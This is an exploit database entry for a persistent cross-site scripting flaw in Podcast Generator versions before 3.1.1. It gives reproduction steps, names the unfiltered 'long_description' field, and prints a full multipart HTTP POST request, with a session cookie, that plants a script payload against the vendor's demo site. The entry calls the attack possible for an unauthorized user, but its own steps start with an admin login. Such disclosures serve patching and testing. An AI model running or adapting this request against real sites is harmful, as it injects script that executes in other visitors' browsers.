Share
## https://sploitus.com/exploit?id=PACKETSTORM:162574
# Exploit Title: Podcast Generator 3.1 - 'Long Description' Persistent Cross-Site Scripting (XSS)  
# Date: 13/05/2021  
# Exploit Author: Ayşenur KARAASLAN  
# Vendor Homepage: https://podcastgenerator.net/demoV2/  
# Software Link: https://podcastgenerator.net/download and https://github.com/PodcastGenerator/PodcastGenerator/archive/v3.1.1.zip  
# Version: < 3.1.1  
# CVE: N/A  
  
Podcast Generator is an open source Content Management System written in PHP and specifically designed for podcast publishing.  
  
#Description  
The following is PoC to use the XSS bug with unauthorized user.  
  
1. Login to your admin account.  
2. "Upload New Episode" or "Edit" field has got "Long Description". Long Description field is not filtered. It is possible to place JavaScript code.  
3. Click the Home button  
4. Click "More" button of created or edited episode.  
  
# Vulnerable Parameter Type: POST  
# Vulnerable Parameter: long_description  
# Attack Pattern: <script>prompt("Aysenur-PoC")</script>  
  
#PoC  
HTTP Request:  
  
POST /demoV2/pg/?p=admin&do=edit&c=ok HTTP/1.1  
Host: podcastgenerator.net  
Cookie: PHPSESSID=2k93317b1dcraih0ti3p8rehc4;  
_ga=GA1.2.2015734934.1620928725; _gid=GA1.2.1455863373.1620928725  
Content-Length: 1590  
Cache-Control: max-age=0  
Sec-Ch-Ua: " Not A;Brand";v="99", "Chromium";v="90"  
Sec-Ch-Ua-Mobile: ?0  
Upgrade-Insecure-Requests: 1  
Origin: https://podcastgenerator.net  
Content-Type: multipart/form-data;  
boundary=----WebKitFormBoundaryMJiUJ3BGzyG5zwxd  
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36  
(KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36  
Accept:  
text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9  
Sec-Fetch-Site: same-origin  
Sec-Fetch-Mode: navigate  
Sec-Fetch-User: ?1  
Sec-Fetch-Dest: frame  
Referer:  
https://podcastgenerator.net/demoV2/pg/?p=admin&do=edit&=episode&name=aysenurxss-poc.jpg  
Accept-Encoding: gzip, deflate  
Accept-Language: tr-TR,tr;q=0.9,en-US;q=0.8,en;q=0.7  
Connection: close  
  
------WebKitFormBoundaryMJiUJ3BGzyG5zwxd  
Content-Disposition: form-data; name="userfile"  
  
aysenurxss-poc.jpg  
------WebKitFormBoundaryMJiUJ3BGzyG5zwxd  
Content-Disposition: form-data; name="title"  
  
Aysenur-PoC  
------WebKitFormBoundaryMJiUJ3BGzyG5zwxd  
Content-Disposition: form-data; name="description"  
  
poc  
------WebKitFormBoundaryMJiUJ3BGzyG5zwxd  
Content-Disposition: form-data; name="countdown"  
  
255  
------WebKitFormBoundaryMJiUJ3BGzyG5zwxd  
Content-Disposition: form-data; name="category[]"  
  
about  
------WebKitFormBoundaryMJiUJ3BGzyG5zwxd  
Content-Disposition: form-data; name="Day"  
  
13  
------WebKitFormBoundaryMJiUJ3BGzyG5zwxd  
Content-Disposition: form-data; name="Month"  
  
5  
------WebKitFormBoundaryMJiUJ3BGzyG5zwxd  
Content-Disposition: form-data; name="Year"  
  
2021  
------WebKitFormBoundaryMJiUJ3BGzyG5zwxd  
Content-Disposition: form-data; name="Hour"  
  
14  
------WebKitFormBoundaryMJiUJ3BGzyG5zwxd  
Content-Disposition: form-data; name="Minute"  
  
29  
------WebKitFormBoundaryMJiUJ3BGzyG5zwxd  
Content-Disposition: form-data; name="long_description"  
  
<script>prompt("aysenur-xss")</script>  
------WebKitFormBoundaryMJiUJ3BGzyG5zwxd  
Content-Disposition: form-data; name="keywords"  
  
poc  
------WebKitFormBoundaryMJiUJ3BGzyG5zwxd  
Content-Disposition: form-data; name="explicit"  
  
no  
------WebKitFormBoundaryMJiUJ3BGzyG5zwxd  
Content-Disposition: form-data; name="auth_name"  
  
aysenur  
------WebKitFormBoundaryMJiUJ3BGzyG5zwxd  
Content-Disposition: form-data; name="auth_email"  
  
aysenur@emailaddress.com  
------WebKitFormBoundaryMJiUJ3BGzyG5zwxd--